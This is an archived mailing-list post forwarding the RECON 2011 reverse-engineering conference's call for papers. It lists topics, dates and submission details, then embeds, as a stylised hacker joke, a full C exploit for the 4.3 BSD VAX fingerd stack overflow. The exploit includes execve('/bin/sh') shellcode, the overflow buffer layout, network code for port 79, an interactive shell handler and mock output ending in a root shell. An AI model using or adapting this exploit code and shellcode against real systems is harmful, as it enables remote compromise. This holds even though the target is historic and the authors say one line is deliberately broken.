[ISN] RECON 2011 CFP

From: InfoSec News <alerts_at_private>
Date: Thu, 10 Mar 2011 04:22:00 -0600 (CST)
Forwarded from: hfortier (at) recon.cx

/*
+                    +                     +         +
                      +                  +           +
+                                             +
                \ /
             +     _        - _+_ -                   ,__
_=.    .:.         /=\       _|===|_                  ||::|
| | _|.        |   |     | |   | |     __===_  -=- ||::|
| ==|   |  |  __    |.:.|   /\| |:. | |    |   | .|| : |||::|
| | -  |.:|_|. :__ |.: |--|==| |  .| |_   | ' |. ||.  |||:.|
__|. | |_|. | |.|...||---|  |==| |   | | |_--.     ||   |||. |
| | | | . | | |::.||: .|  |==| | . : |=|===|    :|| . ||| .|
| : .| .|   |  | | |:.:|| . |  |==| |     |=|===| .   |'   | |  |
| | | | | '           :   .   |   ;     ;    '
| | | | | |
'     :      `   :   '            .       '  .      .         :
'     .                   R E C O N     2 0 1 1     .
`                .                .                           '
.           C F P

0000000    REC0N 2011 (http://recon.cx)
0000020    JULY 8-10
0000040    HYATT REGENCY (New venue)
0000060    M0NTREAL
0000100
0000120    + REC0N 2011
0000140     - Conference and training
0000160     - No censorship, no sales pitches
0000200     - Videos from 2010 are coming online
0000220
0000240    + Now accepting submissions
0000260     - Single track
0000300     - 60 & 30 minute time slots
0000320     - Lightning talks at the party
0000340
0000360    + Primary topics
0000400     - Reverse engineering and/or exploitation:
0000420       + Software
0000440         - Malware
0000460         - Protection/DRM
0000500         - Anti-reversing
0000520         - Static/runtime analysis
0000540       + Hardware
0000560         - Embedded devices, consoles, femtocell
0000600         - Cellphones
0000620         - RFID, SDR (software defined radio)
0000640         - Side channel attacks
0000660         - Physical security (cameras, access control)
0000700       + Protocol
0000720         - GSM / CDMA
0000740
0000760    + Also of interest to us
0001000     - Privacy
0001020       + Anti-censorship
0001040       + Anti-surveillance
0001060       + Anonymity
0001100       + Counter-forensics
0001120
0001140    + Anything else elite
0001160
0001200    + Please include
0001220      - Short summary
0001240      - Name or alias
0001260      - Contact information
0001300      - Bio
0001320
0001340    + Important dates
0001360      - Training/conference registration opens March 20, 2011
0001400      - First round of selections: April 10, 2011
0001420      - CFP closes May 15, 2011
0001440
0001460    + Send submissions to
0001500      - cfp2011 @ recon.cx
0001520
0001540    + Speaker / attendee privacy
0001560      - Recon does not require speakers use their real names
0001600      - Recon does not provide attendee or speaker information to
third-parties
0001620        (except where necessary for registration/payment)

* w0rd, n0w ph0r th3 g00dz..
* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC]
*
* dr0pv4x.c
* t0p-s3kR1t w4r3z k0m1n' @ ya
* str8 fr0m the k0d3l1n3
*   -th3 phr3zh pr1nc3 0f b3llk0r3

 * w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2:

route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup
guys), 8lgm,
klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root_at_private (lol), SN,
Fravia, Mammon_,
m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham,
lcamtuf, Ilfak,
archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George,
hypatia, tdz, Lady Gaga,
Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm,
das_modem, imm,
w1z4rd, l0renz, Subgraph & The Future Crew

 * a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz

 * st3p 1: c0mp1l3

 * st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4

         OLD WAREZ = NO WAREZ ;)

 * st3p 3: ./dr0pv4x [target] offset

          + pr3st0 +

$ ./dropvax X.X.X.X -12345
[+] ATDT X.X.X.X
[+] CONNECT 9600
[+] Return address: 0xUWISH
[*] Compiled for little-endian arch.
[+] Sent payload...
[+] Shell!
4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004
16:56  up  6:08,  1 user,  load average: 0.09, 0.06, 0.03
User     tty from           login@  idle   JCPU   PCPU  what
root     co                  10:49     1                -sh -if
whoami:
root
Warning: no access to tty; thus no job control in this shell...
# exit

k p8ce 0ut,
- dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3

 Responsible Disclosure:

++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0
f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++

* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] *
        (research purposes only!!!)
*/

# include <stdio.h>
# include <strings.h>
# include <signal.h>
# include <errno.h>
# include <ctype.h>
# include <sys/types.h>
# include <sys/time.h>
# include <sys/wait.h>
# include <sys/file.h>
# include <sys/stat.h>
# include <sys/select.h>
# include <sys/socket.h>
# include <netinet/in.h>
# include <arpa/inet.h>
# include <netdb.h>

#ifdef BIG_ENDIAN_ARCH

#define bswap(value) \
(((u32) (value)) << 24 |\
(((u32) (value)) & 0x0000FF00) << 8 |\
(((u32) (value)) & 0x00FF0000) >> 8 |\
((u32) (value)) >> 24)

#else

#define bswap(value) (value)

#endif

extern int errno;

int try_finger(char *, int);
void fdsh(int);

uint32_t typedef u32;


#ifndef USE_ALTERNATE_SHELLCODE		/* VAX-11 shellcode w/ explanation */

/* execve("/bin/sh", NULL, NULL) -
Take advantage of the 4.3 BSD UNIX VM.
It always puts the process entry point (_start) at address 0x00000000.
This gives us valid memory (a zero-byte string, since the first two bytes
of procedures like _start on VAX (those called with "callg" instr.) are
the saved register-mask, and in _start's case this is zero (does not
matter).
Furthermore, this line in kern_exec.c checks if:

if (ap == NULL && uap->envp) {
                       uap->argp = NULL;
	...
}

So we don't need a valid argv at address zero.
See the VAX Architecture Reference Manual (VARM) or the
VAX Arcitecture Handbook.

http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy
of the internal version of the VARM,
which will help explain the stack frame and the instruction set.
*/

unsigned char shellcode[] =
"\021\017"         /* brb shellcode+0x11 (PC-relative) */
"\272\001"         /* popr $0x1 (this is a mask: pop one word into r0) */
"\335\000\335\000" /* pushl $0 ; pushl $0 */
"\335P"            /* pushl %r0 (address of /bin/sh string) */
"\335\003"         /* pushl $0x3 */
"\320^\\"          /* movl %sp, %ap */
"\274;"            /* chmk $0x3b (change mode to kernel, 0x3b = execve) */
"\026\357\353"     /* jsb shellcode+0x4 (PC-relative) */
"\377\377\377"
"/bin/sh";         /* .asciz "/bin/sh" */

#else /* USE_ALTERNATE_SHELLCODE */          /* RTMorris Internet Worm (1988) */

/* If you think the shellcode is the problem, try this one. */

u32 shellcode[] =
{
bswap(0x732f8fdd),
bswap(0x8fdd0068),
bswap(0x6e69622f),
bswap(0xdd5a5ed0),
bswap(0xdd00dd00),
bswap(0xd003dd5a),
bswap(0x3bbc5c5e)
};

#endif


#define Send(str) send(sock, (str), strlen(str), 0)

void fdsh(int sock)
{
printf("[+] Sent payload...\n");

sleep(1);
Send("echo '[+] Shell!';
PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
Send("export PATH\n");
Send("strings /vmunix | fgrep UNIX\n");
Send("w ; echo whoami: ; whoami; exec csh -if\n");

for (;;) {
fd_set fds;
char buf[2048];
int nb;

FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) {
perror("select");
return;
}
if (FD_ISSET(0, &fds)) {
nb = read(0, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
           }
   send(sock, buf, nb, 0);
}
if (FD_ISSET(sock, &fds)) {
nb = read(sock, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
}
write(1, buf, nb);
	}
    }
}

/* This routine exploits a fixed 512 byte input buffer in a VAX running
* the BSD 4.3 fingerd binary.  It send 536 bytes (plus a newline) to
* overwrite six extra words in the stack frame, including the return
* PC, to point into the middle of the string sent over.  The instructions
* in the string do the direct system call version of execve("/bin/sh"). */

/* From sp4f ^^^^^^^ (lolololol) */

/*
* Here's what the VAX-11 stack frame looks like (from 4.3 BSD's <vax/frame.h>:
*/
#if 0
struct frame {
int     fr_handler;
u_int   fr_psw:16,              /* saved psw */
fr_mask:12,             /* register save mask */
:1,
fr_s:1,                 /* call was a calls, not callg
*/
fr_spa:2;               /* stack pointer alignment */
int     fr_savap;               /* saved arg pointer */
int     fr_savfp;               /* saved frame pointer */
int     fr_savpc;               /* saved program counter */
	};
#endif

int try_finger(char *host, int offset)
{
int s, i;
struct sockaddr_in sin = { 0 };
u32 retaddr = 0x7fffe8a8 - offset;
char buf[536];

sin.sin_family = PF_INET;
sin.sin_port = htons(79);
sin.sin_addr.s_addr = inet_addr(host);

if (sin.sin_addr.s_addr == -1) {
struct hostent *h;
h = gethostbyname(host);
if (h == NULL) {
herror("gethostbyname(3)");
return -1;
}
bcopy(h->h_addr, &sin.sin_addr, sizeof(u32));
}

if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
perror("socket(2)");
return -1;
}

    printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr));

if (connect(s, (void *)&sin, sizeof(sin)) < 0){
perror("connect(2)");
printf("[-] NO DIALTONE\n");
return -1;
}

    printf("[+] CONNECT 9600\n");

for (i = 0; i < 400; i++)
buf[i] = '\001';       /* VAX-11 NOP */

    bcopy(shellcode, buf + 400, sizeof(shellcode));

for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++)
buf[i] = '\0';	      /* VAX-11 HALT, try not to land on one. */

    printf("[+] Return address: %#x\n", retaddr);

#ifdef BIG_ENDIAN_ARCH
    printf("[*] Compiled for big-endian arch.\n");
#else
    printf("[*] Compiled for little-endian arch.\n");
#endif

*((u32 *)buf + 128) = bswap(0x7fffeab0);
*((u32 *)buf + 129) = bswap(0x7fffeb60);
*((u32 *)buf + 130) = bswap(0x20000000);
*((u32 *)buf + 131) = bswap(0x7fffeb64);
*((u32 *)buf + 132) = bswap(retaddr);
*((u32 *)buf + 133) = 0;

send(s, buf, sizeof(buf), 0);  	/* sizeof (buf) == 536 */
send(s, "\n", 1, 0);

fdsh(s);
printf("[-] NO CARRIER\n");
return 0;
}

main(int c, char **v)
{
char *host = v[1], *ofs = v[2];

if (!*(++v)) {
       fprintf(stderr, "usage: %s hostname [offset]\n", *(--v));
	exit(1);
}

if (c > 2)
	try_finger(host, atoi(ofs));
else
try_finger(host, 0);

    exit(0);
}


___________________________________________________________      
Tegatai Managed Colocation: Four Provider Blended
Tier-1 Bandwidth, Fortinet Universal Threat Management,
Natural Disaster Avoidance, Always-On Power Delivery 
Network, Cisco Switches, SAS 70 Type II Datacenter. 
Find peace of mind, Defend your Critical Infrastructure.
http://www.tegataiphoenix.com/
Received on Thu Mar 10 2011 - 02:22:00 PST

This archive was generated by hypermail 2.2.0 : Thu Mar 10 2011 - 02:42:01 PST